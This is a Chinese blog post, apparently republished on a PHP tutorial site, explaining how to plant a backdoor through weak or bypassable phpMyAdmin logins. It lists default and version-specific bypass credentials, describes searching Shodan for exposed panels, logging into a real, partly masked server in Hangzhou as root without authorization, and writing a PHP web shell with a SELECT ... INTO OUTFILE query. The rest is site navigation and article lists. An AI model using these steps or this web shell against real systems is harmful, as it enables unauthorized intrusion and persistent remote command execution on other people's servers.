phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
生成静态页面的PHP类
Nov 25 PHP
PHP下用rmdir实现删除目录的三种方法小结
Apr 20 PHP
PHP页面间传递参数实例代码
Jun 05 PHP
PHP中基本符号及使用方法
Mar 23 PHP
ubuntu12.04使用c编写php扩展模块教程分享
Dec 25 PHP
基于递归实现的php树形菜单代码
Nov 19 PHP
PHP实现文件下载详解
Nov 27 PHP
fckeditor上传文件按日期存放及重命名方法
May 22 PHP
PHP/HTML混写的四种方式总结
Feb 27 PHP
PHP5中使用mysqli的prepare操作数据库的介绍
Mar 18 PHP
laravel5.5添加echarts实现画图功能的方法
Oct 09 PHP
php设计模式之代理模式分析【星际争霸游戏案例】
Mar 23 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
Get或Post提交值的非法数据处理
2006/10/09 PHP
关于PHP结束标签的使用细节探讨及联想
2013/03/04 PHP
处理单名多值表单的详解
2013/06/08 PHP
CMS中PHP判断系统是否已经安装的方法示例
2014/07/26 PHP
实例详解PHP中html word 互转的方法
2016/01/28 PHP
PHP简单实现欧拉函数Euler功能示例
2017/11/06 PHP
阿里云Win2016安装Apache和PHP环境图文教程
2018/03/11 PHP
使用jquery选择器如何获取父级元素、同级元素、子元素
2014/05/14 Javascript
javascript实现了照片拖拽点击置顶的照片墙代码
2015/04/03 Javascript
JavaScript三种绑定事件方式及相互之间的区别分析
2017/01/10 Javascript
JavaScript表单验证的两种实现方法
2017/02/11 Javascript
基于jQuery实现的Ajax 验证用户名唯一性实例代码
2017/06/28 jQuery
详解react-webpack2-热模块替换[HMR]
2017/08/03 Javascript
vue项目中公用footer组件底部位置的适配问题
2018/05/10 Javascript
微信小程序自定义prompt组件步骤详解
2018/06/12 Javascript
JS实现的小火箭发射动画效果示例
2018/12/08 Javascript
利用es6 new.target来对模拟抽象类的方法
2019/05/10 Javascript
JavaScript实现简单计算器功能
2019/12/19 Javascript
在vue中封装的弹窗组件使用队列模式实现方法
2020/07/23 Javascript
python类定义的讲解
2013/11/01 Python
Python实现基于C/S架构的聊天室功能详解
2018/07/07 Python
Python数据处理篇之Sympy系列(五)---解方程
2019/10/12 Python
python实现IOU计算案例
2020/04/12 Python
导致python中import错误的原因是什么
2020/07/01 Python
python中id函数运行方式
2020/07/03 Python
详解pycharm自动import所需的库的操作方法
2020/11/30 Python
用canvas实现图片滤镜效果附演示
2013/11/05 HTML / CSS
巴西最大的家具及装饰用品店:Mobly
2017/10/11 全球购物
Hello Molly美国:女性时尚在线
2019/08/26 全球购物
营销与策划个人求职信
2013/09/22 职场文书
环保建议书
2014/03/12 职场文书
《孙权劝学》教学反思
2014/04/23 职场文书
2015年大学班级工作总结
2015/04/28 职场文书
2016年会开场白台词
2015/06/01 职场文书
Centos7中MySQL数据库使用mysqldump进行每日自动备份的编写
2021/08/02 MySQL
原型和原型链 prototype和proto的区别详情
2021/11/02 Javascript